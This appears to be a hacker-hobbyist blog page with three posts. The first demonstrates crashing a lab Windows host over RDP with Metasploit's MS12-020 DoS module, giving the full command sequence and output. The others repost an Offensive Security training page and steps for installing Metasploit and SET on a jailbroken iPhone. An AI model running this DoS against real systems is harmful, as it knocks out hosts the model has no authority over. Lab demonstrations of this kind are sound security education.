MS12-020 Metasploit Fun

Metasploit contains a module to DoS Windows hosts with RDP enabled using the PoC code – patched in MS12-020

Well, it works – short & sweet….

The only known code in the wild is for DoS – so far no remote code execution – but one step generally leads to the other pretty quickly – so disable / patch / protect your RDP ASAP.

Now you see it:

root@bt:~/vpn/darknet# nmap 10.6.6.1 -p 3389

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-25 17:51 EST
Nmap scan report for 10.6.6.1
Host is up (0.0035s latency).
PORT STATE SERVICE
3389/tcp open ms-term-serv

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

64 bytes from 10.6.6.1: icmp_seq=99 ttl=127 time=2.90 ms
64 bytes from 10.6.6.1: icmp_seq=100 ttl=127 time=4.13 ms
64 bytes from 10.6.6.1: icmp_seq=101 ttl=127 time=2.85 ms

Now you dont:

root@bt:/opt/metasploit/msf3# ./msfconsole
msf > info auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options
msf auxiliary(ms12_020_maxchannelids) > set RHOST 10.6.6.1
RHOST => 10.6.6.1
msf auxiliary(ms12_020_maxchannelids) > exploit

[*] 10.6.6.1:3389 – Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 10.6.6.1:3389 – 210 bytes sent
[*] 10.6.6.1:3389 – Checking RDP status…
[+] 10.6.6.1:3389 seems down
[*] Auxiliary module execution completed
msf auxiliary(ms12_020_maxchannelids) >

From 172.16.0.1 icmp_seq=131 Destination Host Unreachable
From 172.16.0.1 icmp_seq=132 Destination Host Unreachable
From 172.16.0.1 icmp_seq=133 Destination Host Unreachable

w00t BSOD !! – DoS (Crashdump & Reboot)

Information Security – By Offensive Security

One stop infosec shop – the Offensive Security guys have thrown a whole bunch of juicy links together in one place – its worth a look:

The Future of Information Security – Offensive Security

Information Security is a vast and deep realm with many facets. Often, companies find themselves confused trying to find quality training, effective awareness programs or more meaningful certifications. In the end, many are left searching Google trying to find answers.

Offensive Security has has put together a set of resources to help your company in its mission to become more secure. Our mission statement is – “Security Through Education“. To us that is not just a statement, it is a way of life. Below is a list of resources that are at your disposal to give you some of the best security based education in the world today.

via Information Security – By Offensive Security.

Metasplot and social engineering toolkit SET on iphone4

Having recently (1 week & counting) upgraded my iPhone 3G to a shiny new HTC Desire (more coming on that later), I was quite interested to see that someone has successfully ported metasploit & SET to an iPhone 4 … now to see if it will run on my now spare iPhone 3G ….

Metasploit 3.4 and SET 0.6.1 on iPhone 4

Posted Aug 7 2010 by muts in Offensive Security with 1 Comment

iphone4 msf 03 Metasploit 3.4 and SET 0.6.1 on iPhone 4Metasploit 3.4.2 on the iPhone 4

Just a quick update on getting your favorite tools on iOS 4 – Metasploit and SET. You need to have a Jailbroken iPhone with SSH access for this. You will also need to install nano and APT 0.7 Strict via Cydia. Getting everything up and running is a breeze now. Open a console and type in:

cd /private/var/

apt-get install subversion nano ruby rubygems wget python

apt-get clean

wget http://www.metasploit.com/releases/framework-3.4.1.tar.bz2

tar jxpf framework-3.4.1.tar.bz2

cd msf3

svn update

Remember that everything takes a bit more time on the iPhone, be patient while running msfconsole for the first time. Once that’s done, its a quick path to a shell:

iphone4 msf 02 Metasploit 3.4 and SET 0.6.1 on iPhone 4

via Metasplot and social engineering toolkit SET on iphone4.